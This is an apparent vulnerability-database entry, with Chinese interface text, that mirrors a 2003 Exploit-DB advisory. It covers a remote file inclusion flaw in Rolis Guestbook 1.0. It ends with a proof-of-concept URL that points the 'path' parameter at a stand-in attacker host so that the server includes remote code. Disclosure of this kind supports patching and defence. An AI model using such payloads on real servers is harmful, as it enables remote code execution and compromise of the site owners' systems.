Koch Roland Rolis Guestbook 1.0 - '$path' Remote File Inclusion

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1054256 漏洞类型
发布时间 2003-11-17 更新时间 2003-11-17
CVE编号 N/A CNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/23384
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/9054/info

It has been reported that Rolis Guestbook may be vulnerable to an input validation issue that may allow an attacker to include malicious files containing arbitrary code to be executed on a vulnerable system.

Rolis Guestbook version 1.0 has been reported to be prone to this issue, however other versions may be affected as well. 

http://www.example.com/rolis_book_path/insert.inc.php?path=http://hacker.com/